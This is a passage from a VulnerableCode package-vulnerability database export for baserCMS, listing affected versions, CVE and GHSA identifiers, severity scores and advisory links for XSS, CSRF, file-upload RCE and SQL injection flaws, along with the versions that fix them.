vulnerability VCID-uedz-j2vn-cbea
37
vulnerability VCID-vqx2-hzju-r7et
38
vulnerability VCID-wvnk-63hy-ykeq
39
vulnerability VCID-xpsb-2yux-g3cf
40
vulnerability VCID-xxud-7jsh-bbc1
41
vulnerability VCID-y2sz-c6vb-pkdp
42
vulnerability VCID-yesf-qxgy-3ygx
43
vulnerability VCID-zqd4-rdem-jfgk
44
vulnerability VCID-zsgc-fnen-b7a6
45
vulnerability VCID-zy68-bur9-1fck
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.0.5.1
2
url pkg:composer/baserproject/basercms@4.0.6
purl pkg:composer/baserproject/basercms@4.0.6
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1q79-sxzp-zker
1
vulnerability VCID-2u6y-aj6t-7fb1
2
vulnerability VCID-3new-f12y-8bf9
3
vulnerability VCID-4zw8-truk-pugf
4
vulnerability VCID-5ay3-1t5g-vycu
5
vulnerability VCID-6trr-5deb-yydm
6
vulnerability VCID-7x3n-4c2b-nfbx
7
vulnerability VCID-891u-x525-ykbb
8
vulnerability VCID-8buz-nsr9-3yge
9
vulnerability VCID-8ssu-umet-37bk
10
vulnerability VCID-9mf7-56fh-fyfk
11
vulnerability VCID-ays7-6wvh-augt
12
vulnerability VCID-d1sf-cmct-zbh1
13
vulnerability VCID-d5gk-q2hh-kba5
14
vulnerability VCID-e4xa-jm9u-nked
15
vulnerability VCID-eq7f-n3g5-s3hu
16
vulnerability VCID-g56w-z9cx-5ygv
17
vulnerability VCID-ga9u-uv9b-tydr
18
vulnerability VCID-ggv8-3v9t-mfea
19
vulnerability VCID-gsg3-fdmu-vqag
20
vulnerability VCID-hpk4-a6tr-3ffe
21
vulnerability VCID-j37y-gws9-ake9
22
vulnerability VCID-jby7-s5ez-dqb3
23
vulnerability VCID-k575-suuf-7bhf
24
vulnerability VCID-k5qv-4yp3-zbgf
25
vulnerability VCID-khft-xvrw-g3dr
26
vulnerability VCID-kmpp-6j49-pqfz
27
vulnerability VCID-mfm9-gsh3-ubg8
28
vulnerability VCID-nxrf-64er-xbfx
29
vulnerability VCID-p695-t9ye-v3ga
30
vulnerability VCID-p6nr-eu91-53b4
31
vulnerability VCID-pd8c-9d7z-zkhg
32
vulnerability VCID-r4jc-22rq-d3cb
33
vulnerability VCID-sqr4-v889-tff8
34
vulnerability VCID-twf5-bzba-gqb4
35
vulnerability VCID-u16w-rbuk-ybfs
36
vulnerability VCID-uedz-j2vn-cbea
37
vulnerability VCID-vqx2-hzju-r7et
38
vulnerability VCID-wvnk-63hy-ykeq
39
vulnerability VCID-xpsb-2yux-g3cf
40
vulnerability VCID-xxud-7jsh-bbc1
41
vulnerability VCID-y2sz-c6vb-pkdp
42
vulnerability VCID-yesf-qxgy-3ygx
43
vulnerability VCID-zqd4-rdem-jfgk
44
vulnerability VCID-zsgc-fnen-b7a6
45
vulnerability VCID-zy68-bur9-1fck
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.0.6
aliases CVE-2017-10843, GHSA-x73x-7gmx-w835
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-guvm-x5jc-mfgc
23
url VCID-hpk4-a6tr-3ffe
vulnerability_id VCID-hpk4-a6tr-3ffe
summary baserCMS is an open source content management system with a focus on Japanese language support. A Cross-site Scripting vulnerability has been identified.
references
0
reference_url http://jvn.jp/en/jp/JVN14134801/index.html
reference_id
reference_type
scores
0
value 8.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url http://jvn.jp/en/jp/JVN14134801/index.html
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2021-39136
reference_id
reference_type
scores
0
value 0.0054
scoring_system epss
scoring_elements 0.67989
published_at 2026-06-05T12:55:00Z
1
value 0.0054
scoring_system epss
scoring_elements 0.6795
published_at 2026-06-04T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2021-39136
2
reference_url https://basercms.net/security/JVN_14134801
reference_id
reference_type
scores
0
value 8.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://basercms.net/security/JVN_14134801
3
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 8.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
4
reference_url https://github.com/baserproject/basercms/commit/568d4cab5ba1cdee7bbf0133c676d02a98f6d7bc
reference_id
reference_type
scores
0
value 8.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms/commit/568d4cab5ba1cdee7bbf0133c676d02a98f6d7bc
5
reference_url https://github.com/baserproject/basercms/security/advisories/GHSA-hgjr-632x-qpp3
reference_id
reference_type
scores
0
value 8.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms/security/advisories/GHSA-hgjr-632x-qpp3
6
reference_url https://nvd.nist.gov/vuln/detail/CVE-2021-39136
reference_id CVE-2021-39136
reference_type
scores
0
value 8.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2021-39136
fixed_packages
0
url pkg:composer/baserproject/basercms@4.5.1
purl pkg:composer/baserproject/basercms@4.5.1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3new-f12y-8bf9
1
vulnerability VCID-4zw8-truk-pugf
2
vulnerability VCID-5ay3-1t5g-vycu
3
vulnerability VCID-7x3n-4c2b-nfbx
4
vulnerability VCID-891u-x525-ykbb
5
vulnerability VCID-8buz-nsr9-3yge
6
vulnerability VCID-8ssu-umet-37bk
7
vulnerability VCID-ays7-6wvh-augt
8
vulnerability VCID-d1sf-cmct-zbh1
9
vulnerability VCID-g56w-z9cx-5ygv
10
vulnerability VCID-ggv8-3v9t-mfea
11
vulnerability VCID-j37y-gws9-ake9
12
vulnerability VCID-jby7-s5ez-dqb3
13
vulnerability VCID-k575-suuf-7bhf
14
vulnerability VCID-k5qv-4yp3-zbgf
15
vulnerability VCID-khft-xvrw-g3dr
16
vulnerability VCID-kmpp-6j49-pqfz
17
vulnerability VCID-mfm9-gsh3-ubg8
18
vulnerability VCID-nxrf-64er-xbfx
19
vulnerability VCID-p695-t9ye-v3ga
20
vulnerability VCID-pd8c-9d7z-zkhg
21
vulnerability VCID-sqr4-v889-tff8
22
vulnerability VCID-u16w-rbuk-ybfs
23
vulnerability VCID-uedz-j2vn-cbea
24
vulnerability VCID-y2sz-c6vb-pkdp
25
vulnerability VCID-zqd4-rdem-jfgk
26
vulnerability VCID-zsgc-fnen-b7a6
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.5.1
aliases CVE-2021-39136, GHSA-hgjr-632x-qpp3
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-hpk4-a6tr-3ffe
24
url VCID-j37y-gws9-ake9
vulnerability_id VCID-j37y-gws9-ake9
summary 
Unrestricted Upload of File with Dangerous Type
baserCMS is a Content Management system. Prior to version 4.7.5, there is a Remote Code Execution (RCE) Vulnerability in the management system of baserCMS. Version 4.7.5 contains a patch.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2023-25654
reference_id
reference_type
scores
0
value 0.02083
scoring_system epss
scoring_elements 0.84309
published_at 2026-06-04T12:55:00Z
1
value 0.02083
scoring_system epss
scoring_elements 0.84332
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2023-25654
1
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
2
reference_url https://github.com/baserproject/basercms/commit/002886be0998c74c386e04f0b43688a8a45d7a96
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-02-25T14:31:00Z/
url https://github.com/baserproject/basercms/commit/002886be0998c74c386e04f0b43688a8a45d7a96
3
reference_url https://github.com/baserproject/basercms/commit/08247f0a633d8e836ce2e5cd2d53aa19901a1359
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-02-25T14:31:00Z/
url https://github.com/baserproject/basercms/commit/08247f0a633d8e836ce2e5cd2d53aa19901a1359
4
reference_url https://github.com/baserproject/basercms/commit/60f83054d8131b0ace60716cec7e629b5eb3a8f0
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-02-25T14:31:00Z/
url https://github.com/baserproject/basercms/commit/60f83054d8131b0ace60716cec7e629b5eb3a8f0
5
reference_url https://github.com/baserproject/basercms/releases/tag/basercms-4.7.5
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-02-25T14:31:00Z/
url https://github.com/baserproject/basercms/releases/tag/basercms-4.7.5
6
reference_url https://nvd.nist.gov/vuln/detail/CVE-2023-25654
reference_id CVE-2023-25654
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2023-25654
7
reference_url https://github.com/advisories/GHSA-h4cc-fxpp-pgw9
reference_id GHSA-h4cc-fxpp-pgw9
reference_type
scores
url https://github.com/advisories/GHSA-h4cc-fxpp-pgw9
8
reference_url https://github.com/baserproject/basercms/security/advisories/GHSA-h4cc-fxpp-pgw9
reference_id GHSA-h4cc-fxpp-pgw9
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-02-25T14:31:00Z/
url https://github.com/baserproject/basercms/security/advisories/GHSA-h4cc-fxpp-pgw9
fixed_packages
0
url pkg:composer/baserproject/basercms@4.7.5
purl pkg:composer/baserproject/basercms@4.7.5
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3new-f12y-8bf9
1
vulnerability VCID-4zw8-truk-pugf
2
vulnerability VCID-7x3n-4c2b-nfbx
3
vulnerability VCID-8buz-nsr9-3yge
4
vulnerability VCID-8ssu-umet-37bk
5
vulnerability VCID-d1sf-cmct-zbh1
6
vulnerability VCID-g56w-z9cx-5ygv
7
vulnerability VCID-ggv8-3v9t-mfea
8
vulnerability VCID-jby7-s5ez-dqb3
9
vulnerability VCID-k5qv-4yp3-zbgf
10
vulnerability VCID-khft-xvrw-g3dr
11
vulnerability VCID-mfm9-gsh3-ubg8
12
vulnerability VCID-nxrf-64er-xbfx
13
vulnerability VCID-p695-t9ye-v3ga
14
vulnerability VCID-pd8c-9d7z-zkhg
15
vulnerability VCID-sqr4-v889-tff8
16
vulnerability VCID-u16w-rbuk-ybfs
17
vulnerability VCID-uedz-j2vn-cbea
18
vulnerability VCID-y2sz-c6vb-pkdp
19
vulnerability VCID-zqd4-rdem-jfgk
20
vulnerability VCID-zxns-tzw3-27fr
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.7.5
aliases CVE-2023-25654, GHSA-h4cc-fxpp-pgw9
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-j37y-gws9-ake9
25
url VCID-jby7-s5ez-dqb3
vulnerability_id VCID-jby7-s5ez-dqb3
summary Cross-Site Request Forgery (CSRF) in baserproject/basercms.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2023-43649
reference_id
reference_type
scores
0
value 0.00118
scoring_system epss
scoring_elements 0.3025
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2023-43649
1
reference_url https://basercms.net/security/JVN_99052047
reference_id
reference_type
scores
0
value 4.7
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L
1
value 4.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-05T20:21:18Z/
url https://basercms.net/security/JVN_99052047
2
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 4.7
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
3
reference_url https://github.com/baserproject/basercms/commit/874c55433fead93e0be9df96fd28740f8047c8b6
reference_id
reference_type
scores
0
value 4.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L
1
value 4.7
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-05T20:21:18Z/
url https://github.com/baserproject/basercms/commit/874c55433fead93e0be9df96fd28740f8047c8b6
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2023-43649
reference_id
reference_type
scores
0
value 4.7
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2023-43649
5
reference_url https://github.com/advisories/GHSA-fw9x-cqjq-7jx5
reference_id GHSA-fw9x-cqjq-7jx5
reference_type
scores
url https://github.com/advisories/GHSA-fw9x-cqjq-7jx5
6
reference_url https://github.com/baserproject/basercms/security/advisories/GHSA-fw9x-cqjq-7jx5
reference_id GHSA-fw9x-cqjq-7jx5
reference_type
scores
0
value 4.7
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L
1
value 4.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-05T20:21:18Z/
url https://github.com/baserproject/basercms/security/advisories/GHSA-fw9x-cqjq-7jx5
fixed_packages
0
url pkg:composer/baserproject/basercms@4.8.0
purl pkg:composer/baserproject/basercms@4.8.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3new-f12y-8bf9
1
vulnerability VCID-4zw8-truk-pugf
2
vulnerability VCID-7x3n-4c2b-nfbx
3
vulnerability VCID-8buz-nsr9-3yge
4
vulnerability VCID-8ssu-umet-37bk
5
vulnerability VCID-d1sf-cmct-zbh1
6
vulnerability VCID-ggv8-3v9t-mfea
7
vulnerability VCID-k5qv-4yp3-zbgf
8
vulnerability VCID-khft-xvrw-g3dr
9
vulnerability VCID-mfm9-gsh3-ubg8
10
vulnerability VCID-nxrf-64er-xbfx
11
vulnerability VCID-p695-t9ye-v3ga
12
vulnerability VCID-sqr4-v889-tff8
13
vulnerability VCID-uedz-j2vn-cbea
14
vulnerability VCID-y2sz-c6vb-pkdp
15
vulnerability VCID-zqd4-rdem-jfgk
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.8.0
1
url pkg:composer/baserproject/basercms@5.0.0
purl pkg:composer/baserproject/basercms@5.0.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3new-f12y-8bf9
1
vulnerability VCID-4zw8-truk-pugf
2
vulnerability VCID-7x3n-4c2b-nfbx
3
vulnerability VCID-8buz-nsr9-3yge
4
vulnerability VCID-8ssu-umet-37bk
5
vulnerability VCID-d1sf-cmct-zbh1
6
vulnerability VCID-k5qv-4yp3-zbgf
7
vulnerability VCID-khft-xvrw-g3dr
8
vulnerability VCID-mfm9-gsh3-ubg8
9
vulnerability VCID-p695-t9ye-v3ga
10
vulnerability VCID-sqr4-v889-tff8
11
vulnerability VCID-y2sz-c6vb-pkdp
12
vulnerability VCID-zqd4-rdem-jfgk
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.0.0
aliases CVE-2023-43649, GHSA-fw9x-cqjq-7jx5
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-jby7-s5ez-dqb3
26
url VCID-k575-suuf-7bhf
vulnerability_id VCID-k575-suuf-7bhf
summary 
baserCMS vulnerable to stored Cross-site Scripting
Stored cross-site scripting vulnerability in Permission Settings of baserCMS versions prior to 4.7.2 allows a remote authenticated attacker with an administrative privilege to inject an arbitrary script.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2022-41994
reference_id
reference_type
scores
0
value 0.00143
scoring_system epss
scoring_elements 0.34314
published_at 2026-06-04T12:55:00Z
1
value 0.00143
scoring_system epss
scoring_elements 0.34412
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2022-41994
1
reference_url https://basercms.net/security/JVN_53682526
reference_id
reference_type
scores
0
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-04-23T14:27:38Z/
url https://basercms.net/security/JVN_53682526
2
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
3
reference_url https://jvn.jp/en/jp/JVN53682526/index.html
reference_id
reference_type
scores
0
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-04-23T14:27:38Z/
url https://jvn.jp/en/jp/JVN53682526/index.html
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2022-41994
reference_id
reference_type
scores
0
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2022-41994
5
reference_url https://github.com/advisories/GHSA-vxwf-79ch-f7f7
reference_id GHSA-vxwf-79ch-f7f7
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-vxwf-79ch-f7f7
fixed_packages
0
url pkg:composer/baserproject/basercms@4.7.2
purl pkg:composer/baserproject/basercms@4.7.2
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3new-f12y-8bf9
1
vulnerability VCID-4zw8-truk-pugf
2
vulnerability VCID-7x3n-4c2b-nfbx
3
vulnerability VCID-8buz-nsr9-3yge
4
vulnerability VCID-8ssu-umet-37bk
5
vulnerability VCID-d1sf-cmct-zbh1
6
vulnerability VCID-g56w-z9cx-5ygv
7
vulnerability VCID-ggv8-3v9t-mfea
8
vulnerability VCID-j37y-gws9-ake9
9
vulnerability VCID-jby7-s5ez-dqb3
10
vulnerability VCID-k5qv-4yp3-zbgf
11
vulnerability VCID-khft-xvrw-g3dr
12
vulnerability VCID-mfm9-gsh3-ubg8
13
vulnerability VCID-nxrf-64er-xbfx
14
vulnerability VCID-p695-t9ye-v3ga
15
vulnerability VCID-pd8c-9d7z-zkhg
16
vulnerability VCID-sqr4-v889-tff8
17
vulnerability VCID-u16w-rbuk-ybfs
18
vulnerability VCID-uedz-j2vn-cbea
19
vulnerability VCID-y2sz-c6vb-pkdp
20
vulnerability VCID-zqd4-rdem-jfgk
21
vulnerability VCID-zsgc-fnen-b7a6
22
vulnerability VCID-zxns-tzw3-27fr
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.7.2
aliases CVE-2022-41994, GHSA-vxwf-79ch-f7f7
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-k575-suuf-7bhf
27
url VCID-k5qv-4yp3-zbgf
vulnerability_id VCID-k5qv-4yp3-zbgf
summary 
baserCMS has an SQL injection vulnerability in its blog post functionality
baserCMS has a SQL injection vulnerability in blog posts.

### Target
baserCMS 5.2.2 and earlier versions

### Vulnerability

Malicious SQL may be executed in blog posts.

### Countermeasures
Update to the latest version of baserCMS

Please refer to the following page to reference for more information.
https://basercms.net/security/JVN_52157568

### Credits

Mirai Matsumoto@Future Secure Wave, Inc.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-27697
reference_id
reference_type
scores
0
value 0.00013
scoring_system epss
scoring_elements 0.02096
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-27697
1
reference_url https://basercms.net/security/JVN_20837860
reference_id
reference_type
scores
0
value 6.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-31T15:27:51Z/
url https://basercms.net/security/JVN_20837860
2
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 6.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
3
reference_url https://github.com/baserproject/basercms/releases/tag/5.2.3
reference_id
reference_type
scores
0
value 6.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-31T15:27:51Z/
url https://github.com/baserproject/basercms/releases/tag/5.2.3
4
reference_url https://github.com/baserproject/basercms/security/advisories/GHSA-vh89-rjph-2g7p
reference_id
reference_type
scores
0
value 6.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-31T15:27:51Z/
url https://github.com/baserproject/basercms/security/advisories/GHSA-vh89-rjph-2g7p
5
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-27697
reference_id
reference_type
scores
0
value 6.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-27697
6
reference_url https://github.com/advisories/GHSA-vh89-rjph-2g7p
reference_id GHSA-vh89-rjph-2g7p
reference_type
scores
url https://github.com/advisories/GHSA-vh89-rjph-2g7p
fixed_packages
0
url pkg:composer/baserproject/basercms@5.2.3
purl pkg:composer/baserproject/basercms@5.2.3
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.2.3
aliases CVE-2026-27697, GHSA-vh89-rjph-2g7p
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-k5qv-4yp3-zbgf
28
url VCID-khft-xvrw-g3dr
vulnerability_id VCID-khft-xvrw-g3dr
summary 
baserCMS has a Cross-site Scripting (XSS) Vulnerability in HTTP 400 Bad Request
XSS vulnerability in HTTP 400 Bad Request to baserCMS.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2024-46995
reference_id
reference_type
scores
0
value 0.0087
scoring_system epss
scoring_elements 0.75582
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2024-46995
1
reference_url https://basercms.net/security/JVN_00876083
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://basercms.net/security/JVN_00876083
2
reference_url https://basercms.net/security/JVN_06274755
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-10-24T19:23:15Z/
url https://basercms.net/security/JVN_06274755
3
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2024-46995
reference_id CVE-2024-46995
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2024-46995
5
reference_url https://github.com/advisories/GHSA-mr7q-fv7j-jcgv
reference_id GHSA-mr7q-fv7j-jcgv
reference_type
scores
url https://github.com/advisories/GHSA-mr7q-fv7j-jcgv
6
reference_url https://github.com/baserproject/basercms/security/advisories/GHSA-mr7q-fv7j-jcgv
reference_id GHSA-mr7q-fv7j-jcgv
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-10-24T19:23:15Z/
url https://github.com/baserproject/basercms/security/advisories/GHSA-mr7q-fv7j-jcgv
fixed_packages
0
url pkg:composer/baserproject/basercms@5.1.2
purl pkg:composer/baserproject/basercms@5.1.2
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3new-f12y-8bf9
1
vulnerability VCID-4zw8-truk-pugf
2
vulnerability VCID-7x3n-4c2b-nfbx
3
vulnerability VCID-8buz-nsr9-3yge
4
vulnerability VCID-8ssu-umet-37bk
5
